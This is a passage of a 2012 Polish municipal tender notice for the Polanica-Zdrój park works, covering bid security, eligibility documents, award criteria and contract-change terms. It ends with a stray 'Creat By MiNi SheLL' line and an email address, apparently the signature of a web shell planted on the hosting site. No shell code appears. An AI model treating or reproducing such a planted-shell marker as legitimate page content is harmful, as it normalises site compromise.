a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c) spowodował, że zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po jego Wykonawcy,
2) wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw. Zamawiający zwróci wadium jeśli wykonawca udowodni, że nastąpiło to z przyczyn nieleżących po jego stronie.
8. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust. 4a ustawy PZP).
9. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.

10. Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę
przed upływem terminu składania ofert.
11. Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie pkt 8, jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
12. Jeżeli wadium zostanie wniesione w pieniądzu zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek wykonawcy.
13. W ofercie należy wpisać nr konta, na które zamawiający ma zwrócić wadium lub dołączyć do oferty upoważnienie do odbioru wadium przez wskazaną osobę.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
     Jeżeli wybrany Wykonawca lub jego Podwykonawca będzie osobą fizyczną, to przed podpisaniem umowy o wykonanie przedmiotu zamówienia, Zamawiający zażąda od niego przedłożenia kserokopii, potwierdzonej za zgodność z oryginałem, dokumentu potwierdzającego wpis do Centralnej Ewidencji i Informacji o Działalności Gospodarczej, aktualnego na dzień składania ofert.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonać w okresie ostatnich pięciu lat przed upływem składania ofert o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, tj. co najmniej 2 (dwie) roboty budowlane odpowiadające opisowi przedmiotu zamówienia zawartego w Opisie Przedmiotu zamówienia polegające na wykonaniu robót o podobnym charakterze i zakresie określonym  w rozdziale II SIWZ, z tym, że każde z zamówień powinno mieć wartość robót co najmniej 400.000,00 PLN (brutto).
 wykonawca załącza min.  protokół końcowego odbioru robót bez usterek i wad dla jednej roboty budowlanej,  odpowiadającej przedmiotowemu zamówieniu,
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć wykaz wykonanych robót budowlanych  informacja na temat doświadczenia, wykaz zrealizowanych prac stanowiących przedmiot zamówienia, sporządzony według wzoru stanowiącego Załącznik Nr 13 do niniejszej SWIZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)dysponować  potencjałem technicznym, wykonawca przedkłada wykaz sprzętu technicznego zgodnie z Załącznikiem nr 15 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania niniejszego warunku Wykonawca zobowiązany jest przedłożyć wykaz osób, którymi dysponuje lub będzie dysponował i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz (informacje te mogą być przedstawione w formie życiorysu zawodowego) sporządzony według wzoru stanowiącego Załącznik Nr 14 do SIWZ oraz oświadczenia, że osoby, które będą uczestniczyć w  wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 

Jeżeli w wykazie osób Wykonawca wskaże osoby, którymi będzie dysponował to zobligowany jest do złożenia pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia. W szczególności Wykonawca musi spełniać następujące warunki  (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna i finansowa  w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku):posiadać środki finansowe lub zdolność kredytową w wysokości co najmniej 650.000,00 zł. PLN.
l)posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej  działalności gospodarczej na kwotę minimum  650.000,00 zł PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Załącznik nr 1 - Kosztorys ofertowy, przedmiar robót  Roboty przygotowawcze część I (branża budowlana, elektryczna i sanitarna); 
Załącznik nr 2  Kosztorys ofertowy przedmiar robót,  -Roboty przygotowawcze część II (branża zieleń i drogi);
Załącznik nr 3  Kosztorys ofertowy, przedmiar robót Wykonie ciągów pieszych;  
Załącznik nr 4  Kosztorys ofertowy,  przedmiar robót  Wykonanie oczka wodnego;
Załącznik nr 5  Kosztorys ofertowy, przedmiar robót  Elementy małej architektury;
Załącznik nr 6  Kosztorys ofertowy, przedmiar robót  Wykonanie i montaż tablic;
Załącznik nr 7  Kosztorys ofertowy, przedmiar robót  Zieleń nasadzenia;
Załącznik nr 8  Kosztorys ofertowy, przedmiar robót  Roboty elektryczne (zasilanie i oświetlenie);
Załącznik nr 9  Zestawienie finansowe (do wypełnienia przez oferenta);
Załącznik nr 10  Formularz ofertowy;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wszelkie zmiany i uzupełnienia do Umowy mogą nastąpić za zgodą obu stron i wymagają aneksu w formie pisemnej pod rygorem nieważności z zastrzeżeniem art. 144 ustawy Prawo zamówień publicznych.
2.W przypadku, kiedy zmiana nie będzie powodowała zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy Strony mogą dokonywać zmian bez ograniczeń
3.Zamawiający przewiduje możliwość zmiany Umowy w stosunku do treści oferty w następującym zakresie: 
1) terminu realizacji Przedmiotu Umowy, gdy zaistnieje przerwa w realizacji zamówienia z przyczyn niezależnych od Wykonawcy, wystąpienia zdarzenia losowego lub siły wyższej albo warunków atmosferycznych uniemożliwiających realizację przedmiotu umowy,
2)terminu realizacji Przedmiotu Umowy oraz innych zmian umowy w wypadku zajścia okoliczności, które nie były znane w chwili zawarcia Umowy lub w wypadku wystąpienia okoliczności niezależnych od stron, a których nie można było przewidzieć w chwili zawarcia Umowy,
3)zmiany wynagrodzenia Wykonawcy i zmian zasad płatności tego wynagrodzenia w sytuacji, kiedy konieczność wprowadzenia zmian wynika z okoliczności, które nie były znane w chwili zawarcia Umowy lub zmiany te są korzystne dla Zamawiającego,.
4)zmian sposobu rozliczania Umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmiany zawartej przez Zamawiającego umowy o dofinansowanie lub wytycznych dotyczących ich realizacji,
5)zmian związanych z rezygnacją przez Zamawiającego z realizacji części/całości Przedmiotu Umowy spowodowanych okolicznościami niezależnymi od Zamawiającego, a nieznanymi w chwili zawarcia Umowy ,
6)gdy niezbędna jest zmiana sposobu wykonania Umowy, o ile zmiana taka jest korzystna dla Zamawiającego oraz konieczna w celu prawidłowego wykonania Umowy,
4.Zaistnienie sytuacji określonej w ust. 3 pkt 1) może stanowić podstawę do wystąpienia przez Wykonawcę do Zamawiającego o przedłużenie terminu realizacji Umowy o okres odpowiadający okresowi zaistniałej przerwy.
5.W przypadku, o którym mowa w ust. 3 pkt 5) wynagrodzenie przysługujące Wykonawcy zostanie proporcjonalnie zmniejszone, przy czym Zamawiający dokona płatności za wykonaną część Umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.polanica.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://bip.polanica.pl/.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2012 godzina 10:00, miejsce: 1.Ofertę należy złożyć w Gminie Polanica-Zdrój ; zs 57 320 Polanica-Zdrój   ul. Jarosława Dąbrowskiego 3  pok. 16 (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Diałanie 4.7 Priorytet 4 RPO WD.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com